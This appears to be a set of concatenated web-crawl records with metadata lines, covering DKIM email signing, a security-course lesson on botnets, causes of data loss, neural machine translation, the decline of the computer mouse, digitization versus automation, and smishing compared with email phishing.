In this screenshot, you can see the mailed-by and signed-by fields. The latter denotes that the email message was signed using DKIM, and it was verified by Gmail servers that the message is authentic and wasn't changed in transit. | <urn:uuid:df360fe6-915b-4203-8a43-37bb959b6392> | CC-MAIN-2022-40 | https://4sysops.com/archives/dkim-vs-spf/?replytocom=1120119 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00762.warc.gz | en | 0.952424 | 507 | 2.609375 | 3 |
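Receiving servers such as Gmail record these verdicts in an Authentication-Results header. The sketch below pulls the SPF and DKIM results out of one; it is a simplified illustration with an invented sample header, and production code should use a proper mail-header parser rather than a regex:

```python
import re

def auth_results(header_value: str) -> dict:
    # Extract the spf= and dkim= verdicts from an
    # Authentication-Results header value (simplified for illustration).
    results = {}
    for method in ("spf", "dkim"):
        m = re.search(rf"\b{method}=(\w+)", header_value)
        if m:
            results[method] = m.group(1)
    return results

header = ("mx.google.com; spf=pass smtp.mailfrom=example.com; "
          "dkim=pass header.d=example.com")
print(auth_results(header))  # {'spf': 'pass', 'dkim': 'pass'}
```

A message that passes both checks was sent by an authorized server and arrived unmodified; a dkim=fail verdict means the signature no longer matches the message contents.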
Bots and Botnets
Once one of your devices is infected, it can be turned into a bot. A bot performs tasks under the control of another program, usually without the need for any human interaction. This is why bots are often referred to as zombies, and in fact, this is a great way to visualize the threat.
If you have an individual or a criminal organization that has infected millions of devices over the past few years, including computers, mobile phones, and IoT devices, and has turned all of those devices into bots, they now have what’s called a botnet (short for bot network).
They can then send commands to bots in their botnet to perform malicious tasks, including:
- Spread misinformation across social media or ecommerce platforms by creating a mass amount of accounts that they control
- Attack legitimate web services with an overwhelming amount of traffic
- Attack networks
Why do criminals create botnets?
Spreading misinformation and fake reviews
Botnets can be extremely lucrative, and surprisingly easy to find for hire. For example, if your competitor wanted to promote their product, but yours had better reviews, they could hire criminal organizations with botnets to create a large number of accounts and leave overwhelmingly positive reviews, which would then trick the e-commerce platform's algorithm into pushing their product over yours.
Distributed Denial of Service Attacks
Or, if your competitor knew that you were going to launch a very important sale at a specific date and time, they could hire criminals with botnets to attack your website right as the product launch is about to happen, rendering your website completely unusable to legitimate customers trying to purchase your product. If the attack were to be successful, your website could potentially remain offline for hours on end, resulting in frustrated customers that change their mind and never purchase your product.
Botnets can also be used for other purposes, such as to relay spam, distribute computing tasks, mine cryptocurrency, or proxy network traffic.
Botnets can be an effective way to deliver spam, such as email spam. As we’ve talked about, email, in broad terms, is not very secure. Anyone can pretend to be sending email on your behalf. Knowing this, spammers can use their botnets by:
- Contacting their botnet, preparing them to send spam
- Using bot devices as email servers
- Sending recipients spam email
Now multiply by the number of recipients that the spammer is trying to reach, and the number of devices they have in their botnet.
Distribute computing tasks
Because devices in a botnet are completely separate devices, the botnet operator can have them work either independently or together, in order to run computing tasks that could otherwise take a very long time to compute on one single device. This could be machine learning operations, for example, which could cost a significant amount of money if you were to run it at a similar scale in a cloud provider.
Instead, you’re able to use other people’s devices for free to run the same kinds of workloads.
Along similar lines, many botnet operators have started using their bots to mine cryptocurrency on their behalf.
Again, mining has become more and more expensive: you need a lot of powerful hardware to mine any significant amount, which also requires higher electricity usage.
Instead, you can mine from other people’s devices for no cost at all.
Proxy network traffic
One last example of when botnets can be useful is to proxy network traffic.
Proxying traffic can be used to anonymize your actions. While there are many legitimate and practical use cases for doing this, it can also be a tool that criminals use to perform illegal actions.
For example, they may try to attack web resources without proper permission. They may try to access bank accounts of compromised users, and so on.
Every action you take on the web leaves a footprint. If you perform illegal actions and you don’t take the necessary steps to mask your footprint, it makes it quite easy for the authorities to find you.
Instead, if you have access to a botnet, you could relay your actions through those devices, which would make it look like those actions were being taken by someone else, potentially on a completely different continent than where you live.
The more bots you can relay the traffic through, the harder it can be to trace back the original requests.
Conclusion for Bots and Botnets
While the list of uses for botnets could go on, these are some examples of why cybercriminals may want to create bots and build bot networks. In the next lesson, we’ll discuss how they use something called Command and Control servers in order to create and control their botnets. | <urn:uuid:c60ce45a-04a9-4e47-a960-6f5b33dd3ab9> | CC-MAIN-2022-40 | https://cybr.com/courses/comptia-security-sy0-601-course/lessons/bots-and-botnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00762.warc.gz | en | 0.957794 | 983 | 3.15625 | 3 |
Data loss happens more often than you might think. Whether it occurs due to human error or software corruption, it is something that organizations both small and large should be careful navigating. Often, data loss can result in catastrophe, leaving companies and individuals completely vulnerable. So, what can you do to prevent data loss from happening to you? The first step is to better understand some of the different ways in which data loss occurs. You may be surprised by some of them.
You may have chosen a solid-state drive to house your company's data backups, perhaps because of its durability, size, or minimal power consumption. SSDs are more durable because they have no moving components: you can drop your computer without worrying about read/write heads failing or platters getting damaged. While all of this is true, keep in mind that SSDs too will fail eventually. There is a common misconception that SSDs are less prone to failure, which unfortunately is not true. It is very common for SSDs to fail logically, through a firmware or controller failure, and they can still be ruined physically, for example by a spilled mug of coffee. Regardless of whether your backups are on a hard drive or a solid-state drive, you should always keep another copy of that data for when the drive inevitably fails.
What happens if you get locked out of your phone, leaving you with no other option than to perform a factory reset to get the phone functioning again? Maybe your laptop is not running at optimal speed and you must factory reset it so it properly functions again. Factory resetting your device completely erases all the data stored on it. This was an intentional design by manufacturers. It was developed so that you can resell your device and not have to worry about your data being accessible to a stranger. One thing most people do not know is that this data is unrecoverable. Therefore, it is extremely important to have all the important data stored on your devices backed up in a different location, like for example, in a cloud-based backup.
Becoming increasingly common in today's digital world, ransomware occurs when hackers use malicious software to block you from accessing your data. Often the hackers live inside your network for months, waiting to capture a password or other personal information, and then all of a sudden they are in and have access to all of your data. They will encrypt everything and demand a ransom to recover it. But here's the kicker: sometimes they will take your money and run without ever making your data accessible again. This can be extremely problematic if no backup of the data exists. It is also an issue if your backups live on the same computer or network as the machine hit by ransomware. In most ransomware cases, data recovery is extremely difficult, yet another reason having a backup of all your data in a secure location is so crucial.
Cloud-based backup failure
Not all cloud-based backups are created equal. Most people assume that the service they have will automatically back up their data to a different, secure location. This may not always be the case. Cloud-based servers can fall apart in many ways just as hardware and software can. Making sure that your cloud-based backup has been audited is one precaution you can take to ensure your data is being backed up properly.
Employees come and go, something that is inevitable. Occasionally, departing employees will decide to sabotage the company’s data by deleting or stealing it upon termination, leaving the entire company without important data. With a proper backup in place, this can prove to be nothing but a minor bump in the road and your company can be back on track in no time.
Data loss from natural disasters happens more often than you might think. Whether it be water damage from a flood, fire damage, or a power surge, these can all cause detrimental, sometimes even irreversible data loss. You never know when disaster may strike, so make sure that all your backups are up to date and reflect the most current version of the data stored on all your devices.
These are just a few of the ways that data loss can occur. While data loss can be a very scary and daunting event, it doesn’t necessarily have to be. With proper backups in place, significant data loss can often be avoided altogether. In the event that you experience data loss, find a reputable data recovery lab to help you get it back. | <urn:uuid:20fd52a8-f603-45a5-a47f-0c305b2fa0dd> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/how-can-data-loss-occur-the-answers-might-surprise-you/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00762.warc.gz | en | 0.953469 | 957 | 2.8125 | 3 |
Machine learning has transformed major aspects of the modern world with great success. Self-driving cars, intelligent virtual assistants on smartphones, and cybersecurity automation are all examples of how far the technology has come.
But of all the applications of machine learning, few have the potential to shape our economy as radically as language translation. The problem of language translation is a natural fit for machine learning to tackle. Language operates on a set of predictable rules, but with a degree of variation that makes it difficult to handle at scale. Machine learning, on the other hand, can leverage repetition, pattern recognition, and vast databases to translate faster than humans can.
There are other compelling reasons to believe language will be one of the most important applications of machine learning. To begin with, there are over 6,500 spoken languages in the world, and many of the more obscure ones are spoken by poorer demographics who are frequently isolated from the global economy. Removing language barriers through technology connects more communities to global marketplaces. More people speak Mandarin Chinese than any other language in the world, making China’s growing middle class a prime market for U.S. companies if they can overcome the language barrier.
Let’s take a look at how machine learning is currently being applied to the language barrier problem, and how it might develop in the future.
Neural machine translation
Recently, language translation took an enormous leap forward with the emergence of a new machine translation technology called Neural Machine Translation (NMT). The emphasis should be on the “neural” component because the inner workings of the technology really do mimic the human mind. The architects behind NMT will tell you that they frequently struggle to understand how it comes to certain translations because of how quickly and accurately it delivers them.
“NMT can do what other machine translation methods have not done before – it achieves translation of entire sentences without losing meaning,” says Denis A. Gachot, CEO of SYSTRAN, a language translation technologies company. “This technology is of a caliber that deserves the attention of everyone in the field. It can translate at near-human levels of accuracy and can translate massive volumes of information exponentially faster than we can operate.”
The comparison to human translators is not a stretch anymore. Unlike the days of garbled Google Translate results, which continue to feed late-night comedy sketches, NMT is producing results that rival those of humans. In fact, SYSTRAN’s Pure Neural Machine Translation product was preferred over human translators 41% of the time in one test.
Martin Volk, a professor at the Institute of Computational Linguistics at the University of Zurich, had this to say about neural machine translation in a 2017 Slator article:
“I think that as computing power inevitably increases, and neural learning mechanisms improve, machine translation quality will gradually approach the quality of a professional human translator over the coming two decades. There will be a point where in commercial translation there will no longer be a need for a professional human translator.”
Gisting to fluency
One telling metric to watch is gisting versus fluency. Do the translations being produced merely communicate the gist of an idea, or do they fluently convey the details?
Previous iterations of language translation technology only achieved the level of gisting. These translations required extensive human support to be usable. NMT successfully pushes beyond gisting and communicates fluently. Now, with little to no human support, usable translations can be processed at the same level of quality as those produced by humans. Sometimes, the NMT translations are even superior.
Quality and accuracy are the main priorities of any translation effort. Any basic translation software can quickly spit out its best rendition of a body of text. To parse information correctly and deliver a fluent translation requires a whole different set of competencies. Volk also said, “Speed is not the key. We want to drill down on how information from sentences preceding and following the one being translated can be used to improve the translation.”
This opens up enormous possibilities for global commerce. Massive volumes of information traverse the globe every second, and quite a bit of that data needs to be translated into two or more languages. That is why successfully automating translation is so critical. Tasks like e-discovery, compliance, or any other business processes that rely on document accuracy can be accelerated exponentially with NMT.
Education, e-commerce, travel, diplomacy, and even international security work can be radically changed by the ability to communicate in your native language with people from around the globe.
Post language economy
Everywhere you look, language barriers are a speed check on global commerce. Whether that commerce involves government agencies approving business applications, customs checkpoints, massive document sharing, or e-commerce, fast and effective translation is essential.
If we look at language strictly as a means of sharing ideas and coordinating, it is somewhat inefficient. It is linear and has a lot of rules that make it difficult to use. Meaning can be obfuscated easily, and not everyone is equally proficient at using it. But the biggest drawback to language is simply that not everyone speaks the same one.
NMT has the potential to reduce and eventually eradicate that problem.
“You can think of NMT as part of your international go-to-market strategy,” writes Gachot. “In theory, the Internet erased geographical barriers and allowed players of all sizes from all places to compete in what we often call a ‘global economy.’ But we’re not all global competitors because not all of us can communicate in the 26 languages that have 50 million or more speakers. NMT removes language barriers, enabling new and existing players to be global communicators, and thus real global competitors. We’re living in the post-internet economy, and we’re stepping into the post-language economy.”
Machine learning has made substantial progress but has not yet cracked the code on language. It does have its shortcomings, namely when it faces slang, idioms, obscure dialects of prominent languages and creative or colorful writing. It shines, however, in the world of business, where jargon is defined and intentional. That in itself is a significant leap forward. | <urn:uuid:584e917b-803f-49de-9bd0-492f49222b56> | CC-MAIN-2022-40 | https://www.cio.com/article/228480/how-machine-learning-can-be-used-to-break-down-language-barriers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00762.warc.gz | en | 0.932915 | 1,277 | 2.890625 | 3 |
Digitize, automate, digitally transform: One and the same? According to half of the companies surveyed in a 2018 Bitkom study, apparently yes. 50 percent of the companies associate the term "digitization" with the "automation of operational business processes". But this is a fallacy - the three terms are fundamentally different and pursue different approaches.
In the following, we have deliberately chosen a narrow definition of digitization in order to highlight the differences between the terms more clearly. In many discussions, the terms digitization, digital transformation and innovation are used synonymously; digital competence models, for example, often stretch "digitization" beyond its actual meaning to cover new ways of working, new business models or new ways of thinking. We would call that digital transformation. But more on that at the end of the article - so stay tuned.
Digitization: From analog to digital
Digitizing initially means nothing more than converting analog data into digital data. For example, scanning paper documents from folders and managing them digitally, or using special programs to read information from analog forms and save them on the server. Today, the majority of companies have digital archives. Documents should not only be available digitally, but should also be systematically organized.
An example: An order letter is scanned and stored digitally. A program reads out the important data: address, items ordered, scope of delivery, client, and so on. This data is then stored in digital archives. Employees can retrieve the information digitally and use it in the delivery process, for example by manually transferring the ordered products to a delivery note or copying the contact data into an invoice.
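As a rough sketch of the extraction step described above, the snippet below pulls the client, address and order items out of a hypothetical OCR text using regular expressions. The field labels and document layout are invented for illustration; a real system would need patterns matched to the actual forms it processes.

```python
import re

# Hypothetical plain-text output of an OCR pass over a scanned order
# letter. The labels ("Client:", "Address:", "Item:") are invented for
# illustration only.
ocr_text = """
Client: ACME GmbH
Address: 12 Example Street, 10115 Berlin
Item: Widget A  Quantity: 40
Item: Widget B  Quantity: 15
"""

def parse_order(text: str) -> dict:
    """Extract structured order data from OCR text via regular expressions."""
    return {
        "client": re.search(r"Client:\s*(.+)", text).group(1).strip(),
        "address": re.search(r"Address:\s*(.+)", text).group(1).strip(),
        "items": [
            {"name": name.strip(), "quantity": int(qty)}
            for name, qty in re.findall(r"Item:\s*(.+?)\s+Quantity:\s*(\d+)", text)
        ],
    }

order = parse_order(ocr_text)
```

The result is a structured record that downstream systems can consume directly, which is exactly what makes the later automation step possible.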
Digitizing a company means restructuring information storage and using technologies to provide data in digitized form.
Automation: Streamline digital processes
Digitization and automation are often regarded as a single entity, or even erroneously used as synonyms. In fact, however, process automation is only made possible by digitization, which turns newly acquired data volumes into ever more complex IT structures. Digital processes can thus quickly become confusing, fragmented and error-prone, especially if they have to be operated manually.
Process automation helps to use the abundance of digital data and applications efficiently. Processes are thus streamlined and a company can work more cost-effectively thanks to automation. Simple, repetitive and monotonous tasks are taken over by RPA bots or iPaaS solutions, for example, while employees can concentrate on the core business.
Back to our example: once the order data is available digitally, employees no longer have to process it manually. Bots can read the documents, compare the information and automatically initiate the next steps: sending the appropriate product order to the warehouse, printing delivery notes or creating an invoice. In an automated workflow, the order is processed more efficiently and with fewer errors, saving employees time for more important tasks.
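The automated workflow just described can be sketched as a simple pipeline of steps. The step functions below are hypothetical stand-ins for real integrations (a warehouse system, a document printer, an invoicing API); the point is only to show digitized order data flowing through the follow-up steps without manual handling.

```python
# Minimal sketch of an automated order-processing workflow. Every step
# here is a placeholder for a real system integration.
def send_to_warehouse(order: dict) -> dict:
    # In reality: push a picking order to the warehouse system.
    order["warehouse_notified"] = True
    return order

def create_delivery_note(order: dict) -> dict:
    order["delivery_note"] = (
        f"Delivery note for {order['client']}: {len(order['items'])} line item(s)"
    )
    return order

def create_invoice(order: dict) -> dict:
    order["invoice_total"] = sum(
        item["quantity"] * item["unit_price"] for item in order["items"]
    )
    return order

PIPELINE = [send_to_warehouse, create_delivery_note, create_invoice]

def process_order(order: dict) -> dict:
    """Run one order through every step of the automated workflow."""
    for step in PIPELINE:
        order = step(order)
    return order

result = process_order({
    "client": "ACME GmbH",
    "items": [
        {"name": "Widget A", "quantity": 40, "unit_price": 2.5},
        {"name": "Widget B", "quantity": 15, "unit_price": 4.0},
    ],
})
```

In practice each step would be an RPA bot or an iPaaS connector rather than a local function, but the hand-off of structured data from step to step is the same idea.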
Digital transformation: Creating new technologies
Digital transformation goes even further: it does not merely streamline processes to make them more efficient; it calls their very existence into question. Digital transformation means changing technologies and developing them further in innovative ways.
Groundbreaking steps in digital transformation include cloud data storage and blockchain technology, for example. It is therefore a disruptive, societal change, not just a reaction to existing processes that are to be improved. For example, fax became email and email became messenger apps.
To stay with our example, instead of storing analog writing or emails digitally and pushing them later with the help of process automation, a company could develop a completely new method of order creation and become a pioneer in the industry. For example, develop a proprietary app with a new, unprecedented technology that makes the previous process obsolete.
The challenge of digital transformation is about developing innovative solutions and creating completely new processes.
Digitization as the basis for digital transformation & automation
Although digitization, automation and digital transformation are fundamentally different, they are closely linked. Digitization provides digital data for processes that can later be automated. And on the basis of previously existing processes, completely new ones can ultimately be created. So anyone who wants to digitally transform or automate first needs solid digitization as a basis. | <urn:uuid:be492c6c-0cb6-46e9-9f13-bd37185a084e> | CC-MAIN-2022-40 | https://www.botsandpeople.com/blog/automation-digitization-and-digital-transformation-these-are-the-differences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00162.warc.gz | en | 0.933393 | 865 | 2.625 | 3 |
You’re probably using a mouse today, but you may never buy one again. All the planets are aligning against this humble pointing device.
The computer mouse has long been associated with the PC, but in fact it was invented during the Kennedy administration (in 1963) by Silicon Valley engineers Douglas Engelbart and Bill English. (Click here to see Engelbart demonstrate his invention in San Francisco in late 1968.)
The mouse was nothing but a lab rat until the Xerox Star shipped in 1981. Though it was the first time anyone could buy a mouse, few did. The Star was overpriced ($16,000) and poorly marketed. The IBM PC came out that year, too — without a mouse. But when the Apple Macintosh hit in January of 1984, the mouse went mainstream and has been with us ever since.
Now, Gartner analyst Steve Prentice says the mouse’s dominance as the leading pointing device may be over within 2 to 4 years. And I tend to agree.
That’s quite a prediction. Habits die hard, and our mouse addiction won’t be easy to break. However, several recent developments are slowly changing — or threaten to change — our mouse habit.
1. Apple’s giant trackpad with multi-touch.
Available on MacBook Air and MacBook Pro laptops, this pointing device represents a body blow to the appeal of using a mouse with an Apple mobile computer. The new trackpad is superior because in addition to pointing and clicking, you get gestures, which adds a whole new layer of control.
2. Gaming pointing devices.
Remember when everyone used to play games on a PC using a mouse and keyboard? Neither do I. Console gaming has re-set the bar for gaming input devices, and now even PC games seem to call for joysticks, yokes, steering wheels and other non-mouse input devices.
3. “Brain-reading” devices.
Like the mouse between 1963 and 1981, these devices are still in the lab. But one company, Emotiv Systems, plans to place a $300 headset on the market by the end of this year that lets gamers control some aspects of games with thoughts alone (go here for the demo).
4. Apple iPhone and the “iPhone Killers.”
This newest category of cell phone ditches physical keyboards and phone pointing devices (like BlackBerry’s “pearl,” toggle switches or the tracking sticks on some handsets) altogether in favor of full-size touch screens. Although people tend to see iPhone-like devices as replacing keyboards, they’re getting millions of people used to the idea of controlling an entire operating system with a touch screen.
These four factors, and others, will weaken our reliance on mice. But something else will deliver the knock-out blow: The next generations of Windows and Mac OS. Microsoft has already announced that Windows 7 will be optimized for Microsoft Surface-like touch interfaces. And I’m confident that Apple will take advantage of its many patents for “multi-touch” systems and ship an iPhone-like version of Mac OS within the next year or two.
These next-generation operating systems will sport what I call multitouch, physics and gestures (MPG) user interfaces. They represent the next quantum leap in PC usability. And they have no use for a mouse.
The evolution of user interfaces, in fact, can be viewed as a process of getting the user “closer” to objects on-screen. In the beginning, we interfaced with computers on the other side of the glass, handing punch-cards to an operator for processing. Then we typed abstract commands, but directly on a keyboard. Then we used a mouse to simulate the grabbing and selecting, the dragging and dropping of on-screen objects. In the coming fourth phase, we’ll reach out and touch documents, photos and folders directly using iPhone-like user interfaces.
In these four phases of human-computer interaction, the mouse was of use in only one of them. And that era is about to draw to a close.
So take the time to savor every point and every click. It won’t last. The mouse is as good as dead. | <urn:uuid:66a49644-5da4-412f-bac5-a0c7ed43e05c> | CC-MAIN-2022-40 | https://www.datamation.com/trends/the-mouse-is-dead/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00162.warc.gz | en | 0.938015 | 880 | 2.625 | 3 |
What have smishing offenders learned from their phishing email counterparts?
Email-based credential theft remains by far the most common threat we encounter in our data. But SMS-based phishing (commonly known as smishing and including SMS, MMS, RCS, and other mobile messaging types) is a fast-growing counterpart to email phishing. In December 2021, we published an article exploring the ubiquity of email-based phish kits. These toolkits make it straightforward for anyone to set up a phishing operation with little more than a laptop and a credit card. Since then, we’ve tracked their evolution as they gain new functions, including the ability to bypass multifactor authentication.
In this blog post we’re going to look at smishing vs. phishing and what smishing offenders have learned from their email counterparts, as well as some significant differences that remain between the two threats.
Setting the (crime) scene
A modern email phishing setup can be as simple as one person with a computer and access to common cloud-hosted services. But for a smishing operation, the picture is somewhat different. While software smishing kits are available to buy on the dark web, accessing and abusing mobile networks requires a little more investment.
Figure 1. A smishing operation photographed by Greater Manchester Police in the U.K.
Unlike the internet, mobile networks are closed systems. This makes it more difficult for people to anonymously create and send messages across the network. To send a malicious mobile message, a smishing threat actor needs to first gain access to the network, which requires sophisticated exploits or dedicated hardware. “SIM bank” hardware has come down in price recently, but units can still cost hundreds or even thousands of dollars, depending on how many SIM cards are supported and the number of simultaneous mobile connections they can handle. And of course, the criminals also need to pay for active SIM cards to use in their SIM bank. As mobile network operators identify and exclude malicious numbers, new SIM cards are needed, creating ongoing connection costs.
Figure 2. An example of a representative SIM bank for sale online
The physical nature of mobile networks also increases the risk of detection for smishing threat actors. In the UK case noted above, the culprit was arrested in a hotel room. This is not uncommon—network operators can use cell towers to pinpoint where malicious activity is coming from. Smishing offenders therefore need to be highly mobile, moving frequently to avoid getting caught.
Social Engineering and Other Similarities
While there are important structural differences between smishing and phishing, these attacks have plenty in common when it comes to social engineering.
Fundamentally, both approaches rely on lures that prey on human psychology. They use tendencies such as loss aversion and biases towards urgency and authority to convince victims to perform an action. Differences between email and mobile messaging formats mean that smishing attempts are shorter and less elaborate than many email lures. But while the execution may vary, the impetus of a missed package or a request from the boss remains the same.
Figure 3. Smishing lures are typically much less complex than phishing messages using the same theme
Smishing and traditional phishing also share similarities in how they target potential victims. In addition to high-volume messaging, both also make use of more specific “spear phishing/smishing” techniques. In these attacks, cyber criminals use detailed research to tailor messages, often targeting higher value people within an organization. As we’ve explored on this blog before, mobile phone numbers can be easily linked to a range of personal information, making them a potent source for spear smishing expeditions. As with their targeting behavior, we also see similar seasonal campaign patterns with both phishing and smishing. Summers are usually slower and activity is often suspended completely during winter holiday periods.
Table 1. Key differences between mobile smishing and email phishing
For many email users, ignoring spam and other basic kinds of malicious messages has become second nature. But since mobile messaging is newer, many people still place a high level of trust in the security of mobile communications. So one of the most important differences between smishing and phishing is our basic susceptibility to attack. Click rates on URLs in mobile messaging are as much as eight times higher than those for email, vastly increasing the odds that a malicious link will be accessed when sent via SMS or other mobile messaging. This responsiveness persists even in markets where services like WhatsApp and Messenger have replaced SMS as the dominant means of mobile text communication. We expect organizations and businesses to send us important messages via SMS, and we act on them quickly when they arrive.
The prevalence of links over attachments is another important differentiator. Mobile messages are not an effective way to send malicious attachments, because many devices limit side-loading and messaging services cap attachment sizes. Instead, most mobile attacks make use of embedded links, even when distributing malware such as FluBot, which spread across the U.K. and Europe last year. Email attacks, on the other hand, still deliver malware attachments in around 20-30% of malicious messages.
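Because embedded links carry most of the risk in mobile messages, a first screening step is simply to pull the URLs out of a message body for inspection. The sketch below does this with a regular expression; the smishing text and domain are invented examples, and a production filter would of course go far beyond pattern matching.

```python
import re

# Rough URL matcher: absolute http(s) URLs, plus bare domains followed by
# a path. Deliberately simple and illustrative, not exhaustive.
URL_PATTERN = re.compile(r"https?://\S+|\b[\w-]+(?:\.[\w-]+)+/\S*")

def extract_urls(message: str) -> list:
    """Return every URL-looking substring found in a message body."""
    return URL_PATTERN.findall(message)

# Invented smishing text; the domain is a made-up example, not a real site.
sms = ("USPS: your package is on hold. Pay the redelivery fee at "
       "http://usps-track.example-redelivery.xyz/u8s2 to release it.")
links = extract_urls(sms)
```

Extracted links can then be checked against reputation feeds or sandboxed before a user ever taps them, which is where the real defensive value lies.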
Personal phone numbers also expose location information in the form of an area code. This can provide other opportunities for location- and language-based tailoring that aren’t present in an email address. Similarly, end users have limited ability to see how the SMS message was routed, seeing only the number it appears to have been sent from. While both mobile numbers and email addresses can be masked, email headers contain much more detailed information about how a message was routed to the recipient and may allow them to spot a malicious message.
As a common point of connection between our personal and professional lives, mobile phones are a high-value target for cyber criminals. A single device may contain accounts giving access to individual and corporate finances, sensitive personal information and confidential commercial documents. In the U.S. last year, smishing rates almost doubled, and that trend is set to continue this year. And while smishing operations have to work with character limits, location constraints and increased overheads, it’s clear that lessons learned from email phishing are helping to maximize their returns. In fact, we believe that the success rate for smishing attacks is likely to be substantially higher overall than for email phishing, though the volume of email attacks remains many times greater.
With that in mind, it’s vital that security awareness training gives mobile threats an appropriate level of coverage for the risk they represent. | <urn:uuid:3eaf0070-c75d-44cf-abce-7d2761c4ff66> | CC-MAIN-2022-40 | https://www.cloudmark.com/en/blog/mobile/smishing-vs-phishing-understanding-differences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00162.warc.gz | en | 0.94901 | 1,338 | 2.609375 | 3 |